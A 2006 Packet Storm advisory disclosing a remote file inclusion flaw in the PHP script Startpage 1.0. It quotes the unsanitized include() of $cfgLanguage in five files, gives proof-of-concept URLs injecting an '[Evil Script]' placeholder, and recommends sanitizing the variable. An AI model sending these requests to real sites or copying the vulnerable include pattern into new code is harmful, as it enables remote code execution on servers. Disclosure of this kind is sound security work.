startpage10.txt

2006-08-27T00:00:00
ID PACKETSTORM:49260
Type packetstorm
Reporter Sh3ll
Modified 2006-08-27T00:00:00

Description

                                        
                                            `--------------------------------------------------------------------------------------------  
Startpage 1.0 cfgLanguage Remote File Inclusion  
--------------------------------------------------------------------------------------------  
Author : Sh3ll  
Date : 2006/08/10  
HomePage : http://www.sh3ll.ir  
Contact : sh3ll[at]sh3ll[dot]ir  
--------------------------------------------------------------------------------------------  
Affected Software Description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Application : Startpage  
version : 1.0  
Venedor : http://matthijs.draijer.org  
Class : Remote File Inclusion  
Risk : High  
Summary :   
Startpage v1.0 Is a Script Which Shows Your Favortie Links.  
--------------------------------------------------------------------------------------------  
Vulnerability:  
~~~~~~~~~~~~~  
The Problem Exists Is in The edit.php , functions.php , new.php PageBottom.php & PageTop.php  
When Used The Variable $cfgLanguage in a include() Function Without Being Declared.  
----------------------------------------edit.php--------------------------------------------  
...  
<?php  
include ("language_$cfgLanguage.php");  
?>  
...  
----------------------------------------functions.php---------------------------------------  
...  
<?php  
include ("config.php");  
include ("language_$cfgLanguage.php");  
?>  
...  
----------------------------------------new.php---------------------------------------------  
...  
<?php  
include ("config.php");  
include ("functions.php");  
include ("PageTop.php");  
include ("language_$cfgLanguage.php");  
connect_db();  
?>  
...  
----------------------------------------PageBottom.php--------------------------------------  
...  
<?php  
include ("config.php");  
include ("language_$cfgLanguage.php");  
?>  
...  
----------------------------------------PageTop.php-----------------------------------------  
...  
<?php  
include ("config.php");  
include ("language_$cfgLanguage.php");  
?>  
...  
--------------------------------------------------------------------------------------------  
PoC:  
~~~  
http://www.target.com/[Startpage]/edit.php?=[Evil Script]  
http://www.target.com/[Startpage]/functions.php?cfgLanguage=[Evil Script]  
http://www.target.com/[Startpage]/new.php?cfgLanguage=[Evil Script]  
http://www.target.com/[Startpage]/PageBottom.php?cfgLanguage=[Evil Script]  
http://www.target.com/[Startpage]/PageTop.php?cfgLanguage=[Evil Script]  
  
Solution:  
~~~~~~~~  
Sanitize Variabel $cfgLanguage in edit.php , functions.php , new.php , PageBottom.php   
& PageTop.php  
--------------------------------------------------------------------------------------------  
Note:  
~~~~  
Venedor Contacted, But No Response. So Do a Dirty Patch.  
--------------------------------------------------------------------------------------------  
Shoutz:  
~~~~~~  
~ Special Greetz To My Best Friend N4sh3n4s & My GF Atena  
~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams   
`